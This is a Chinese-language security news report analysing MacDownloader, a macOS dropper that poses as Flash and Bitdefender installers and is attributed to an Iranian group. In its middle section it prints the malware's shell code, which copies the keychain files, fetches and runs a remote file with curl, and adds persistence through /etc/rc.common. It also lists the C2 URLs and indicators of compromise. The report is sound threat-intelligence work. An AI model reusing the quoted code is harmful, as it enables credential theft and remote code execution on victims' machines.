E安全2月9日讯 国外安全研究人员发现一款名为MacDownloader的Mac OS恶意软件代理（Malware Agent），其已经被实际应用于国防工业领域，另有报道称有人利用其攻击某位人权倡导者。有趣的是，MacDownloader会伪装为Adobe Flash安装工具以及Bitdefender恶意软件清除工具，并借此提取系统信息以及Mac OS X系统中的钥匙串数据库副本。根据对基础设施及代码状态的观察，安全研究人员认为这些事件代表着攻击者对该代理的首次部署尝试，且其尚不具备持久性等其它特性。相反，MacDownloader作为一种简单的筛选工具存在，且拥有更大的邪恶野心。

该Mac OS恶意软件还反映出此前安全研究人员曾经研究过的ExtremdDownloader方案的特征，而后者的样本已经确定与之使用同样的基础设施。最后，通过对受害者数据及代码引用进行测试，安全研究人员发现该恶意软件采取一种独特的开发方式，即潜在接入由该黑客组织此前开发完成的其它代理当中。

由于此前已经在美国黑帽大会（Black Hat USA）上发布了关于国家支持型间谍活动的卡内基基金会技术预览版，因此安全研究人员一直在不断披露与伊朗相关的当前恶意活动，同时提供各类入侵检测指标。虽然此次发现的代理既不复杂亦不具备完整的功能，但其突然出现在苹果计算机社区之内，提醒用户以往对此类设备的安全认知其实并不确切。

背景

安全研究人员从2016年起一直在记录伊朗相关恶意软件代理的变化情况——事实上，此前的恶意软件代理往往针对于从Windows及Android设备处提取文件与键盘输入记录。尽管Windows仍是世界上使用范围最广的操作系统，但亦有不少行业开始转而选择Mac OS以享受其安全性与稳定性优势。然而，Mac OS用户群体的扩张虽然逃过了不少针对Windows的攻击者并能够发挥其远程访问工具较少的优势，但却并不代表Mac OS的内置防御机制真的更为出色。因此，Mac OS用户同样面临着相当严峻的恶意软件攻击风险，甚至可能由于对安全性的忽略而身陷更危险的境地。事实上，相当一部分人权团体，特别是专注于伊朗问题的组织，据称高度依赖于苹果相关设备。

事故与影响

最初被观察到的MacDownloader代理活动在于伪造美国联合技术公司（是全球多元化制造企业之一，主要为全球航空航天和建筑业提供高科技产品和服务）的网站，此网站据悉由伊朗攻击者负责维护并用以传播Windows恶意软件。其页面显示提供“特别项目与课程”，且提到洛克希德·马丁公司、内华达公司、雷声公司以及波音公司的员工及实习生皆有参与相关课程。各公司的对应链接也同样被该黑客组织设计为恶意软件传播载体。其用于传播恶意软件的主机此前还曾被用作在某个牙医诊所以及美国空军基本训练网页等子域名中部署BeEF框架（全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具，BeEF使用浏览器漏洞来获得目标机器的控制权）。

在下载之后，该代理会显示一条法语警告，提示本地视频播放器中的“插件存在安全漏洞”，同时向访问者提供七条Adobe Flash链接。根据安全研究人员的观点，MacDownloader的初次传播尝试会直接告知对方其属于恶意软件。根据操作系统检测，其会为目标提供Windows或者Mac版本恶意软件，其中Windows客户端提供一款由Go语言编写的涓滴工具（也可称为病毒释放器）。MacDownloader样本包中的名称亦进一步证明了其来源确实为伊朗——“addone flashplayer.app”这一表达证明该文件的命名方式基于波斯语语法。而恶意活动中的其它一些持续性基础设施与趋势走向亦表明，该Charming Kiteen恶意组织应该来自伊朗且与伊朗安全部门有所关联。

MACDOWNLOADER

该恶意软件在攻击当中使用的是一款名为MacDownloader的Mac OS特定涓滴恶意工具（一个64位Mac二进制文件），且基于来自被嵌入至该二进制文件内开发环境的字符串。MacDownloader创建于2016年年末，且开发水平似乎不高，这可能是业余开发者第一次尝试编写此类恶意工具。在多数情况下，其使用的代码都直接复制自其它项目。另外，MacDownloader的主要目标似乎是对受感染系统执行初步分析，同时从MacOS的钥匙串密码管理器中收集凭证——这与由同一黑客组织开发的Windows恶意软件如出一辙。

截至撰稿时，MacDownloader似乎还完全未被VirusTotal上的病毒扫描引擎所发现，这意味着其很难被消费级杀毒软件检测到。

MacDownloader会在执行时显示伪造的Adobe Flash Player对话框，其提示受害者点击其中的“更新Flash-Player”按钮。有趣的是，点击“关闭”按钮确实能够退出该应用。在受害者成功点击更新按钮后，其还会显示后续伪造对话框，宣称其发现计算机上存在恶意软件，且该应用正在对其进行清理。

这套对话框的设置其实令有些意外与困惑，特别是考虑到MacDownloader本身给出的理由是更新Flash Player，而非更新杀毒软件。不过这种不协调感很快就有了答案，因为安全研究人员注意到该恶意软件的资源中存在一个NIB文件（用于为Mac应用存储用户界面设计），其在目前的版本中似乎并未被用到。这些对话内容中也充斥着基本的拼写与语法错误，这表明开发者并不重视质量控制。安全研究人员认为MacDownloader最初是被设计为一款伪造的病毒清除工具，但随后为了适应特定的社交工程类尝试，其被重新打包在一款伪造的Flash Player更新工具。

该恶意软件从嵌入的Resources文件夹中读取“checkadr.txt”文件，其中包含作为第一条信标的URL：

http://46{.}17.97.37/Servermac.php

本样本中使用的命令与控制服务器已经于两周前被第三方关闭。另一资源“eula-help.txt”似乎提供了一条内部开发服务器地址，这反映出开发者是希望将MacDownloader作为简单的涓滴工具。

http://192{.}168.3.217/DroperTest

另外，另一名为“appId.txt”的文件似乎作为该代理执行活动的惟一标识符。其被标记为将提取自主机的数据发送至命令与控制服务器。在安全研究人员检测的样本中以及观察到测试流程中，其被设置为“snc”——此分配给受害者的标识符与该黑客组织Charming Kiteen此前的其它钓鱼活动恰好吻合。

看起来，该应用还包含一条未被使用的受害者主机持久访问安装尝试。在代码中，一段质量低下的代码片断用于利用shell脚本保存来自命令与控制服务器的响应，并通过在/etc/rc.common文件内写入条目以将其标记为永久。从理论角度讲，每当受感染计算机重新启动，该shell脚本都将启动并从某个远程位置下载文件，并将其与此前迭代进行差异比较，并在存在差异时执行较新版本。不过即使是在服务器被关停之前，安全研究人员也没能得到正确的服务器响应。在测试当中，这条代码似乎并未被执行，相反指向远程服务器的调用实际是通过苹果Core Services框架实现的。另外，安全研究人员发现指向端点以触发PHP错误的任务是由并未附加任何参数的GET请求完成的，而并未采取植入机制。因此，安全研究人员发现没有直接证据表明MacDownloader拥有永久性，只能说其在开发时考虑过加入远程更新与持久性功能。

do shell script "uname -a > /etc/checkdrive.chk"

zip -rj /etc/kcbackup.cfg /Library/Keychains/

echo "#!/bin/bash

curl -o /tmp/mastering-vim.pdf %@

md5 /tmp/mastering-vim.pdf | grep vim | cut -d- -f 2 > /etc/newf_md5.md5

 

if cmp /etc/newf_md5.md5 /etc/old_md5.md5

then

    #echo equal

    cp /etc/newf_md5.md5 /etc/oldf_md5.md5

    chmod +x /tmp/mastering-vim.pdf

    /tmp/mastering-vim.pdf

fi

 

" > /etc/.checkdev && if cat /etc/rc.common | grep .checkdev; then sleep 1; else echo "sleep %d && /etc/.checkdev &" >> /etc/rc.common; fi && chmod +x /etc/.checkdev && /etc/.checkdev with administrator privileges

与此同时，MacDownloader会从受感染系统中收集信息，具体包括用户的活动钥匙串，并随后将其上传至命令与控制服务器。此涓滴工具还会记录运行进程、已安装应用程序并通过伪造的系统偏好对话框获取用户名与密码。在拥有了用户凭证后，攻击者随后即可访问存储在钥匙串数据库内的加密密码。尽管Chrome与火狐浏览器并不会在钥匙串内存储凭证，但Safari以及MacOS系统服务确实会借此存储网站、远程文件系统、加密驱动器以及其它关键性资源的密码。可以看到，伊朗各类定制化恶意软件的一大共性在于专注检索已存储密码并通过键盘记录器收集在线服务的密码内容。利用这些密码，攻击者随后即可访问受害者的邮件、云文件以及社交网络活动并进行备份。该黑客组织此前使用的Windows代理同样采取这一模式——在感染后从火狐及Chrome的已保存密码及浏览历史记录中收集信息。预计这些特性将在MacDownloader的后续版本中一一出现。

所有收集到的信息随后都会在提交后被编译并存储在/tmp/applist.txt文件当中，而非直接移除：

[

  "OS version:[UNAME OUTPUT]",

  "Root Username: \"[USER]\"",

  "Root Password: \"[PASSWORD]\"",

  "Keychains loaded in current user ",

  "Local ip address: [IP ADDRESS]",

  "Ifconfig: [IFCONFIG OUTPUT]",

  [

    [CONTENT OF /Applications]

  ],

  [

    ....

    "process name is: Bitdefender Adware Removal Tool\t PID: 17550  Run from: file:\/\/\/Users\/user\/Desktop\/addone%20flashplayer.app\/Contents\/MacOS\/Bitdefender%20Adware%20Removal%20Tool"

  ]

]

一旦执行完毕，MacDownloader就会顺利显示对话框，通知Flash Player的更新已经完成。不用说，实际上其并没有进行任何Flash Player安装或者更新。

起源与发展

在该应用的元数据（Info.plist）当中，MacDownloader包含有一些不寻常的引用，这也成为我们了解其发展历程的线索。其中“Bundle identifier”属性被设定为“zenderod.Bitdefender-Adware-Removal-Tool”，这代表该代理的次要伪造对象为Bitdefender。在标准软件开发实践当中，该字符串的第一部分应被设定为原始开发者的姓名或者公司名称，这里其被设定为“zenderod”。Zenderod代表的当然是Zayandeh Rood，这是一条流经伊朗伊斯法罕的著名河流。奇怪的是，这一词汇的音译也符合Novin Pardaz Zenderod域名（zenderod.ir，目前指向npzr.ir），这是一家位于伊斯法罕的软件与托管厂商。尽管该站点未提供任何与Mac OS软件开相关的专业知识，但从应用本身的质量来看，开发者只要具备一定shell脚本使用能力即可实现。安全研究人员与Novin Pardaz Zenderod公司的一位行政人员取得了联系，而对方表示其从未开发过Mac OS软件或者其它相关恶意软件。

另外，其“Readable Copyright”属性在About对话中显示的可用版权信息被设定为“Copyright © 2015 Mamedof. All rights reserved”。这一已经过期的版权声明表示开发者可能从其它项目中直接复制了模板。我们找不到包含此版权名称的应用，这表明其可能源自某个并不知名的应用或者属于同一开发者的此前开发成果。

在二进制文件中，安全研究人员发现了一组字符串，其在由XCode嵌入的文件系统路径中显示了MacDownloader的开发者用户名。这些字符串显示，该开发者的名为Shayan，且其中亦包含此前提到的项目名称。

/Users/shayan/Desktop/MacDownloader/MyApp3/

/Users/shayan/Library/Developer/Xcode/DerivedData/Adware_Removal_Tool-frnnuqjzajnllqgzakkslsovdhag/Build/Intermediates/Adware Removal Tool.build/Debug/Adware Removal Tool.build/Objects-normal/x86_64/AppDelegate.o

值得注意的是，在对该恶意代理进行测试的过程中，该恶意软件的操作者之一似乎感染了一台MacBook Pro。为了实现这一目标，该恶意软件代理向命令与控制服务器上传了与该设备相关的系统詯怀OS X钥匙串数据库，其用户为“Ultrone”而密码为“saeed”——这大概代表另一个名字。通过解析，已上传的钥匙串提供了另一些社交关系线索以及攻击者用于获取VPN凭证与Wifi网络记录的战术。

另外需要强调的是，其中的无线网络名为Jok3r与mb_1986。Jok3r对应的是伊朗网络安全小组（Iran Cyber Security Group）中的一名成员，其在网站攻击领域表现得相当活跃。而伊朗网络安全小组其后与其它众多网站攻击组织被证实为政府方面收编，旨在为伊朗提供商业安全服务与渗透测试培训。

而“mb_1986”这一无线网络名称更有意思，因为其与此前由Flying Kitten恶意组织于2014年夏季发起的恶意活动有所关联。此恶意软件代理的早期样本被称为“Sayad”，而嵌入于该恶意软件中的多条资源路径显示其通过Windows环境开发完成，而对应用户名正是“mb_1986”。(具体路径为 c:\Users\mb_1986\Desktop\Projects\Tiny_st\BlackBerry\obj\Debug\MSSUP.pdb)。此用户名还曾出现在此前一台名为“BORHAN”的伊朗计算机的系统日志当中，其曾在2013年12月到2014年2月期间多次被Stealer恶意软件所入侵。BORHAN中包含大量专业软件开发工具，这反映出攻击者们的管理与开发偏好（Subversion、VMWare vSphere以及微软Visual Studio）。这些重复出现且周期较短的入侵活动表明，该主机属于Stealer家族中的一名开发者，且他们在藏红花行动（Operation Saffron Rose）后进一步将该平台开发为MiniSayad，并与MacDownloader操作者存在社交往来。

入侵判断指标

文件名及对应的HASH

addone flashplayer.app.zip

52efcfe30f96a85c9c068880c20663db64f0e08346e0f3b59c2e5bbcb41ba73c

Bitdefender Adware Removal Tool

7a9cdb9d608b88bd7afce001cb285c2bb2ae76f5027977e8635aa04bd064ffb7

网络地址
46{.}17.97.37
officialswebsites{.}info
utc.officialswebsites{.}info

E安全注：本文系E安全独家编译报道，转载请联系授权，并保留出处与链接，不得删减内容。联系方式：① 微信号zhu-geliang ②邮箱eapp@easyaq.com

@E安全，最专业的前沿网络安全媒体和产业服务平台，每日提供优质全球网络安全资讯与深度思考，欢迎关注微信公众号「E安全」（EAQapp），或登E安全门户网站www.easyaq.com , 查看更多精彩内容。